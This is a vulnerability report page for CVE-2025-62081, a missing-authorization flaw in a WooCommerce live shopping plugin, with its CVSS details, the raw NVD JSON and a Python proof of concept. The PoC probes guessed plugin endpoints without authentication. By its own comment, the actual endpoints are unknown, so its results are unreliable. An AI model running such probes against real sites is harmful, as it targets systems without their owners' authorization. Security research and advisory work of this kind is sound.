Security Vulnerability Report
中文
CVE-2025-62081 CVSS 5.3 MEDIUM

CVE-2025-62081

Published: 2025-12-31 15:15:52
Last Modified: 2026-04-28 19:34:52

Description

Missing Authorization vulnerability in Channelize.io Team Live Shopping & Shoppable Videos For WooCommerce live-shopping-video-streams allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Live Shopping & Shoppable Videos For WooCommerce: from n/a through <= 2.2.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Live Shopping & Shoppable Videos For WooCommerce <= 2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-62081 PoC - Missing Authorization in Live Shopping Plugin # Target: WordPress site with Live Shopping & Shoppable Videos For WooCommerce <= 2.2.0 target_url = "http://target-wordpress-site.com" # Since exact vulnerable endpoints are not specified, this is a generic PoC structure # Attackers would need to identify specific unprotected endpoints def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-62081 This PoC attempts to access admin functionality without authentication """ # Common patterns for Live Shopping plugin endpoints vulnerable_endpoints = [ f"{target_url}/wp-json/live-shopping/v1/", f"{target_url}/wp-admin/admin-ajax.php?action=live_shopping_", f"{target_url}/wp-json/wp/v2/live-shopping-video-streams" ] for endpoint in vulnerable_endpoints: try: # Send unauthenticated request response = requests.get(endpoint, timeout=10) # If we get a successful response (200) instead of 401/403, # the endpoint is likely vulnerable if response.status_code == 200: print(f"[+] Potential vulnerability found at: {endpoint}") print(f"[+] Status Code: {response.status_code}") print(f"[+] Response preview: {response.text[:200]}") return True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") return False if __name__ == "__main__": print("CVE-2025-62081 PoC - Live Shopping Plugin Authorization Bypass") print("=" * 60) check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62081", "sourceIdentifier": "[email protected]", "published": "2025-12-31T15:15:52.143", "lastModified": "2026-04-28T19:34:52.437", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Channelize.io Team Live Shopping & Shoppable Videos For WooCommerce live-shopping-video-streams allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Live Shopping & Shoppable Videos For WooCommerce: from n/a through <= 2.2.0."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en Channelize.Io Team Live Shopping &amp; Shoppable Videos For WooCommerce permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Live Shopping &amp; Shoppable Videos For WooCommerce: desde n/a hasta 2.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/live-shopping-video-streams/vulnerability/wordpress-live-shopping-shoppable-videos-for-woocommerce-plugin-2-2-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}